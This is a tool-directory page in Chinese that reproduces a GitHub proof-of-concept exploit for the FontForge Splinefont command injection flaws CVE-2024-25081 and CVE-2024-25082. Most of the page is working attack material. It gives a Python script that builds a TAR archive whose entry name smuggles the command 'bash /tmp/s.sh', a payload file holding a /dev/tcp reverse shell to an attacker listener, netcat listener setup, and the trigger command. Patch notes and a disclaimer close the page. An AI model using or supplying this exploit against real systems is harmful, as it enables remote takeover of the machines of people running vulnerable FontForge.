Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-25082_CVE-2024-25081 — FontForge Splinefont 特制文件名命令注入漏洞 | Kitploit
工具/GitHubGitHub/alielkhatteb/cve-2024-25082_cve-2024-25081
Payload生成漏洞分析漏洞利用渗透测试命令与控制学习与教育
GitHubalielkhatteb/cve-2024-25082_cve-2024-25081

CVE-2024-25082_CVE-2024-25081

FontForge Splinefont 特制文件名命令注入漏洞

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
115个月前尚未审核

⚠️ FontForge RCE — CVE-2024-25081 和 CVE-2024-25082 - 概念验证

📖 概述

针对 FontForge ≤ 20230101(Splinefont 组件)中两个命令注入漏洞的概念验证利用。

CVE攻击向量触发方式
CVE-2024-25081构造的文件名直接打开文件
CVE-2024-25082构造的存档文件名TAR/ZIP/GZ/BZ2 解压

本 PoC 针对 CVE-2024-25082 —— FontForge 的自动存档解压功能未对文件名进行转义处理,直接传入 shell,从而允许嵌入在 TAR 条目名称中的分号分隔载荷执行任意命令。


工作原理

FontForge 支持直接从存档中打开字体文件。在解压 TAR 存档时,Splinefont 组件使用存档条目中的文件名构造 shell 命令。由于文件名未经转义,条目名称中的分号 (;) 会跳出预期命令并注入任意 shell 指令。

恶意 TAR 条目名称:

root@kitploit:~
exploit.ttf;bash /tmp/s.sh;

当 FontForge 处理这个存档时,shell 将其解释为:

root@kitploit:~
<解压命令> exploit.ttf ; bash /tmp/s.sh ; 

环境

  • 受影响软件: FontForge ≤ 20230101
  • 平台: Linux
  • 攻击者监听端: 192.168.1.20:4444(根据需要调整)

📋 前提条件

  • Python 3(仅标准库,使用 tarfile 模块)
  • 攻击机上的 netcat
  • 目标机上的 FontForge ≤ 20230101

🛠️ 概念验证

1. 在攻击机上启动一个 netcat 监听端

root@kitploit:~
nc -lvnp 4444

2. 生成恶意 TAR 存档

root@kitploit:~
# 写入反弹 shell 载荷
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# 构建恶意存档
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF

3. 在目标机上使用 FontForge 打开该存档

root@kitploit:~
fontforge exploit.tar

一个反弹 shell 将会连接回你的监听端。


🔒 补丁

在 FontForge post-20230101 版本中通过 PR #5367 修复。请升级到最新版本。

  • Debian/Ubuntu: sudo apt upgrade fontforge
  • 手动构建: 从 fontforge/fontforge 拉取最新代码

🔍 参考

  • NVD — CVE-2024-25081
  • NVD — CVE-2024-25082
  • FontForge 修复 PR #5367

⚖️ 免责声明与条款

本概念验证(PoC)代码仅供教育和授权渗透测试目的使用。

  • 未授予任何修改、重新分发或用于其他目的的权限。
  • 未经授权的使用或修改可能违法且不道德。
  • 作者对任何滥用或损害不承担任何责任。
下载工具